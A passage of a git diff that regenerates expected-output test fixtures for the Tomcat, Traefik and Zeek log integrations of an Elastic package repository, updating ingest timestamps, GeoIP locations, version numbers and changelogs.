(KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||lorumw", "event": { - "ingested": "2021-06-09T13:32:47.950819900Z" + "ingested": "2021-12-14T14:58:59.365423148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%APACHETOMCAT-3071-FGET: 10.122.0.80||olupt||ola||[11/Jun/2019:11:51:06 CT]||etquasia||https://example.net/adm/snostr.jpg?tec=itaspe#con||illumdo||antium||remaper||eseosq||2945||https://www.example.com/uae/ata.htm?snulap=cidu#hilmol||Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g||quamq", "event": { - "ingested": "2021-06-09T13:32:47.950825100Z" + "ingested": "2021-12-14T14:58:59.365423550Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 tdolo2150.www.example %APACHETOMCAT- ABCD: 10.165.33.19||uamqu||iusmodi||[25/Jun/2019:6:53:40 ET]||aparia||https://mail.example.com/ccusant/epteurs.htm?oidentsu=oditau#onsec||dit||namaliqu||yCic||tetura||1569||https://www.example.net/ttenb/eirure.txt?rem=exer#eeufug||Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||lapari", "event": { - "ingested": "2021-06-09T13:32:47.950835300Z" + "ingested": "2021-12-14T14:58:59.365423936Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 10 01:56:14 cinge6032.api.local %APACHETOMCAT- BADMTHD: 10.87.92.17||utlabore||tamr||[10/Jul/2019:1:56:14 CT]||iutaliq||https://mail.example.org/onemul/trudexe.txt?ura=oreeufug#Quisa||quiav||ctionofd||elit||sam||6211||https://internal.example.org/unt/isni.htm?ecillum=olor#amei||Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||quid", "event": { - "ingested": "2021-06-09T13:32:47.950840900Z" + "ingested": "2021-12-14T14:58:59.365424318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%APACHETOMCAT-7615-BADMETHOD: 10.51.52.203||wri||itame||[24/Jul/2019:8:58:48 ET]||dictasun||https://example.com/lorese/olupta.jpg?onsec=idestl#litani||emp||arch||non||mollit||5823||https://internal.example.org/tobeatae/ntut.gif?exe=naa#equat||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||mqu", "event": { - "ingested": "2021-06-09T13:32:47.950846100Z" + "ingested": "2021-12-14T14:58:59.365424704Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 7 16:01:23 ende6053.local %APACHETOMCAT- rndmmtd: 10.0.211.86||rsp||imipsa||[07/Aug/2019:4:01:23 CEST]||int||https://internal.example.net/llitani/uscipit.html?etcons=etco#iuntN||utfugi||ursintoc||tio||mmodicon||6776||https://internal.example.net/tvol/lup.gif?ollita=qua#ionula||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||cusa", "event": { - "ingested": "2021-06-09T13:32:47.950851Z" + "ingested": "2021-12-14T14:58:59.365425093Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-264-OPTIONS: 10.106.34.244||eumiu||nim||[21/Aug/2019:11:03:57 PST]||rehen||https://mail.example.net/ptat/mipsu.htm?eturadip=amquaera#rsitamet||leumiur||ssequamn||ave||taliqui||3714||https://example.net/undeomn/ape.jpg?amco=ons#onsecte||Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||atquo", "event": { - "ingested": "2021-06-09T13:32:47.950856Z" + "ingested": "2021-12-14T14:58:59.365425482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2943-nGET: 
10.191.210.188||inculpa||ruredol||[05/Sep/2019:6:06:31 OMST]||ipit||https://www.example.org/quae/periam.html?emoenimi=iquipex#mqu||onorume||abill||ametcon||ofdeFini||7052||https://example.net/tionev/uasiarch.html?qui=ehender#equa||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||nimides", "event": { - "ingested": "2021-06-09T13:32:47.950860900Z" + "ingested": "2021-12-14T14:58:59.365425880Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6165-BDMTHD: 10.2.38.49||asiarc||lor||[19/Sep/2019:1:09:05 GMT+02:00]||snula||https://www.example.com/bori/dipi.gif?utf=dolor#dexe||nemul||Duis||lupt||quatur||5775||https://www.example.org/ipsa/con.gif?uianonnu=tatiset#quira||mobmail android 2.1.3.3150||aea", "event": { - "ingested": "2021-06-09T13:32:47.950865700Z" + "ingested": "2021-12-14T14:58:59.365426704Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 3 20:11:40 didun1193.example %APACHETOMCAT- id: 10.66.92.90||orumwri||atisu||[03/Oct/2019:8:11:40 PST]||tse||https://example.com/iat/tqui.gif?utaliqui=emse#emqui||cipitla||tlab||vel||ionevo||4580||https://mail.example.com/volupta/umfu.gif?tisetq=tDuisaut#dolo||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||samvol", "event": { - "ingested": "2021-06-09T13:32:47.950870700Z" + "ingested": "2021-12-14T14:58:59.365427165Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 18 03:14:14 apari2660.www5.lan %APACHETOMCAT- BADMTHD: 10.97.108.108||fficiad||teirured||[18/Oct/2019:3:14:14 
PST]||sistena||https://example.com/caboN/imipsam.jpg?catcupid=ritquiin#quisnost||sequines||olor||sequa||lorum||7649||https://mail.example.com/Sedut/tatis.gif?reeufugi=sequines#minimve||Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g||toditau", "event": { - "ingested": "2021-06-09T13:32:47.950875800Z" + "ingested": "2021-12-14T14:58:59.365427562Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 nvolupta238.www.host %APACHETOMCAT- COOK: 10.147.147.248||onpr||uira||[01/Nov/2019:10:16:48 CET]||ptatev||https://api.example.net/uiaco/aliqu.txt?udexerci=uae#imveni||econ||aborio||rve||catcup||177||https://www5.example.org/busBon/norumetM.jpg?vitaedi=rna#cons||Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36||lupta", "event": { - "ingested": "2021-06-09T13:32:47.950880800Z" + "ingested": "2021-12-14T14:58:59.365427951Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 15 17:19:22 icer123.mail.example %APACHETOMCAT- NCIRCLE: 10.152.190.61||imvenia||culp||[15/Nov/2019:5:19:22 GMT-07:00]||nesciu||https://www.example.org/roinBCSe/eetdolor.html?tla=iaconseq#sed||sedd||atione||tvolup||oremeu||6708||https://api.example.com/dan/pta.html?oNem=itaedict#eroi||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||uptateve", "event": { - "ingested": "2021-06-09T13:32:47.950885700Z" + "ingested": "2021-12-14T14:58:59.365428347Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 lumqui6488.api.example %APACHETOMCAT- 
DETECT_METHOD_TYPE: 10.129.232.105||des||deFini||[30/Nov/2019:12:21:57 GMT-07:00]||aliquaU||https://www.example.net/tvolu/imve.txt?gnaaliq=quam#deriti||edictasu||eturadi||umS||noru||5321||https://api.example.org/taevitae/tevel.htm?vol=ita#iquipexe||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||quamqua", "event": { - "ingested": "2021-06-09T13:32:47.950891100Z" + "ingested": "2021-12-14T14:58:59.365428801Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5473-TRACE: 10.12.173.112||Excepteu||mco||[14/Dec/2019:7:24:31 PT]||undeom||https://internal.example.org/teturadi/radipi.gif?upidatat=mod#niamqui||litsedd||nidol||inBC||hite||423||https://api.example.net/dminimve/remips.txt?uiac=tquii#tesse||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||emeumfu", "event": { - "ingested": "2021-06-09T13:32:47.950895900Z" + "ingested": "2021-12-14T14:58:59.365429184Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event"
diff --git a/packages/tomcat/manifest.yml b/packages/tomcat/manifest.yml
index 0d7edf95e72..6eb553234a5 100644
--- a/packages/tomcat/manifest.yml
+++ b/packages/tomcat/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: tomcat
 title: Apache Tomcat
-version: 1.2.0
+version: 1.2.1
 description: Collect and parse logs from Apache Tomcat servers with Elastic Agent.
 categories: ["web", "security"]
 release: ga
diff --git a/packages/traefik/changelog.yml b/packages/traefik/changelog.yml
index 86c2da81610..ceb103ea8da 100644
--- a/packages/traefik/changelog.yml
+++ b/packages/traefik/changelog.yml
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json index 17b84dc7482..5284f34678a 100644 --- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json +++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-common.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-12-09T13:49:15.037421500Z", + "ingested": "2021-12-14T14:59:04.121402887Z", "original": "192.168.33.1 - - [02/Oct/2017:20:22:07 +0000] \"GET /ui/favicons/favicon-16x16.png HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 262 \"Host-host-1\" \"http://172.19.0.3:5601\" 2ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -85,14 +85,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -137,7 +137,7 @@ }, "event": { "duration": 3000000, - "ingested": "2021-12-09T13:49:15.037430300Z", + "ingested": "2021-12-14T14:59:04.121404978Z", "original": "89.160.20.156 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -176,14 +176,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -227,7 +227,7 @@ }, "event": { "duration": 247000000, - "ingested": "2021-12-09T13:49:15.037436300Z", + "ingested": "2021-12-14T14:59:04.121405389Z", "original": "89.160.20.156 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -302,7 +302,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:49:15.037442100Z", + "ingested": "2021-12-14T14:59:04.121405749Z", "original": "::1 - - [29/Nov/2018:15:03:51 +0000] \"GET / HTTP/1.1\" 404 19 \"-\" \"curl/7.62.0\" 10 \"backend not found\" \"/\" 0ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -338,14 +338,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -389,7 +389,7 @@ }, "event": { "duration": 13000000, - "ingested": "2021-12-09T13:49:15.037447900Z", + "ingested": "2021-12-14T14:59:04.121406108Z", "original": "89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -427,14 +427,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -478,7 +478,7 @@ }, "event": { "duration": 8000000, - "ingested": "2021-12-09T13:49:15.037453700Z", + "ingested": "2021-12-14T14:59:04.121406456Z", "original": "89.160.20.156 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -548,7 +548,7 @@ } }, "event": { - "ingested": "2021-12-09T13:49:15.037459400Z", + "ingested": "2021-12-14T14:59:04.121406812Z", "original": "127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] \"GET /apache_pb.gif HTTP/1.0\" 200 2326", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json index 3a1ce846417..109d4a78508 100644 --- a/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json +++ b/packages/traefik/data_stream/access/_dev/test/pipeline/test-format-json.log-expected.json 
@@ -46,7 +46,7 @@ }, "event": { "duration": 40356, - "ingested": "2021-12-09T13:49:16.108367600Z", + "ingested": "2021-12-14T14:59:05.208971580Z", "original": "{\"BackendAddr\":\"\",\"BackendName\":\"Traefik\",\"BackendURL\":{\"Scheme\":\"\",\"Opaque\":\"\",\"User\":null,\"Host\":\"\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"ClientAddr\":\"127.0.0.1:48658\",\"ClientHost\":\"127.0.0.1\",\"ClientPort\":\"48658\",\"ClientUsername\":\"-\",\"DownstreamContentSize\":19,\"DownstreamStatus\":404,\"DownstreamStatusLine\":\"404 Not Found\",\"Duration\":40356,\"FrontendName\":\"backend not found\",\"OriginContentSize\":19,\"OriginDuration\":4086,\"OriginStatus\":404,\"OriginStatusLine\":\"404 Not Found\",\"Overhead\":36270,\"RequestAddr\":\"backend.elastic-package-service.docker.localhost\",\"RequestContentSize\":0,\"RequestCount\":7,\"RequestHost\":\"backend.elastic-package-service.docker.localhost\",\"RequestLine\":\"GET / HTTP/1.1\",\"RequestMethod\":\"GET\",\"RequestPath\":\"/\",\"RequestPort\":\"-\",\"RequestProtocol\":\"HTTP/1.1\",\"RetryAttempts\":0,\"StartLocal\":\"2021-03-16T18:56:54.735539596Z\",\"StartUTC\":\"2021-03-16T18:56:54.735539596Z\",\"downstream_Content-Type\":\"text/plain; charset=utf-8\",\"downstream_X-Content-Type-Options\":\"nosniff\",\"level\":\"info\",\"msg\":\"\",\"origin_Content-Type\":\"text/plain; charset=utf-8\",\"origin_X-Content-Type-Options\":\"nosniff\",\"request_Accept\":\"*/*\",\"request_User-Agent\":\"curl/7.67.0\",\"time\":\"2021-03-16T18:56:54Z\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -123,7 +123,7 @@ }, "event": { "duration": 3034764, - "ingested": "2021-12-09T13:49:16.108372900Z", + "ingested": "2021-12-14T14:59:05.208974022Z", "original": "{\"BackendAddr\":\"172.21.0.2:80\",\"BackendName\":\"backend-backend-docker\",\"BackendURL\":{\"Scheme\":\"http\",\"Opaque\":\"\",\"User\":null,\"Host\":\"172.21.0.2:80\",\"Path\":\"\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"ClientAddr\":\"172.21.0.1:59068\",\"ClientHost\":\"172.21.0.1\",\"ClientPort\":\"59068\",\"ClientUsername\":\"-\",\"DownstreamContentSize\":383,\"DownstreamStatus\":200,\"DownstreamStatusLine\":\"200 OK\",\"Duration\":3034764,\"FrontendName\":\"Host-backend-docker-docker-localhost-2\",\"OriginContentSize\":383,\"OriginDuration\":2155389,\"OriginStatus\":200,\"OriginStatusLine\":\"200 OK\",\"Overhead\":879375,\"RequestAddr\":\"backend.docker.docker.localhost\",\"RequestContentSize\":0,\"RequestCount\":27,\"RequestHost\":\"backend.docker.docker.localhost\",\"RequestLine\":\"GET / HTTP/1.1\",\"RequestMethod\":\"GET\",\"RequestPath\":\"/\",\"RequestPort\":\"-\",\"RequestProtocol\":\"HTTP/1.1\",\"RetryAttempts\":0,\"StartLocal\":\"2021-03-16T19:08:41.039598834Z\",\"StartUTC\":\"2021-03-16T19:08:41.039598834Z\",\"downstream_Content-Length\":\"383\",\"downstream_Content-Type\":\"text/plain; charset=utf-8\",\"downstream_Date\":\"Tue, 16 Mar 2021 19:08:41 GMT\",\"level\":\"info\",\"msg\":\"\",\"origin_Content-Length\":\"383\",\"origin_Content-Type\":\"text/plain; charset=utf-8\",\"origin_Date\":\"Tue, 16 Mar 2021 19:08:41 GMT\",\"request_Accept\":\"*/*\",\"request_User-Agent\":\"curl/7.64.1\",\"time\":\"2021-03-16T19:08:41Z\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/traefik/manifest.yml b/packages/traefik/manifest.yml index b9529913088..011a4b5f887 100644 --- a/packages/traefik/manifest.yml +++ b/packages/traefik/manifest.yml 
@@ -1,6 +1,6 @@ name: traefik title: Traefik -version: 1.2.1 +version: 1.2.2 release: ga description: Collect logs and metrics from Traefik servers with Elastic Agent. type: integration diff --git a/packages/zeek/changelog.yml b/packages/zeek/changelog.yml index e7d52685ec9..4c9d874dc89 100644 --- a/packages/zeek/changelog.yml +++ b/packages/zeek/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.5.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json b/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json index 03e30262e58..7e867d6d8b8 100644 --- a/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json +++ b/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json @@ -15,7 +15,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071408600Z", + "ingested": "2021-12-14T14:59:07.224983069Z", "original": "{\"ts\":1568132368.465338,\"ts_delta\":32.282249,\"peer\":\"bro\",\"gaps\":0,\"acks\":206,\"percent_lost\":0.0}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -40,7 +40,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071411900Z", + "ingested": "2021-12-14T14:59:07.224985489Z", "original": "{\"ts\":1617062640.941952,\"ts_delta\":900.0005369186401,\"peer\":\"zeek\",\"gaps\":58475,\"acks\":65665,\"percent_lost\":89.05048351481003}", "type": "info", "created": "2020-04-28T11:07:58.223Z", 
@@ -65,7 +65,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071417300Z", + "ingested": "2021-12-14T14:59:07.224985934Z", "original": "{\"ts\":1617063540.942231,\"ts_delta\":900.0002789497376,\"peer\":\"zeek\",\"gaps\":54754,\"acks\":61818,\"percent_lost\":88.5729075673752}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -90,7 +90,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071422800Z", + "ingested": "2021-12-14T14:59:07.224986315Z", "original": "{\"ts\":1617064440.942597,\"ts_delta\":900.0003659725189,\"peer\":\"zeek\",\"gaps\":51022,\"acks\":57974,\"percent_lost\":88.00841756649533}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -115,7 +115,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071427300Z", + "ingested": "2021-12-14T14:59:07.224986695Z", "original": "{\"ts\":1617065340.942651,\"ts_delta\":900.0000541210175,\"peer\":\"zeek\",\"gaps\":55105,\"acks\":62497,\"percent_lost\":88.17223226714883}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -148,7 +148,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071431100Z", + "ingested": "2021-12-14T14:59:07.224987082Z", "original": "{\"ts\":1568132368.465338,\"ts_delta\":32.282249,\"peer\":\"bro\",\"gaps\":0,\"acks\":206,\"percent_lost\":0.0}", "type": "info", "created": "2020-04-28T11:07:58.223Z", diff --git a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json index 90dda5010a4..845b81d5f07 100644 --- a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json +++ b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json 
@@ -38,7 +38,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-12-09T13:50:56.388703500Z", + "ingested": "2021-12-14T14:59:07.719052684Z", "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":true,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -78,14 +78,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -120,7 +120,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-12-09T13:50:56.388712400Z", + "ingested": "2021-12-14T14:59:07.719086167Z", "original": "{\"ts\":1547188416.857497,\"uid\":\"CAcJw21BbVedgFnYH4\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38340,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -159,14 +159,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -195,14 +195,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -219,7 +219,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-12-09T13:50:56.388718400Z", + "ingested": "2021-12-14T14:59:07.719086748Z", "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -259,14 +259,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
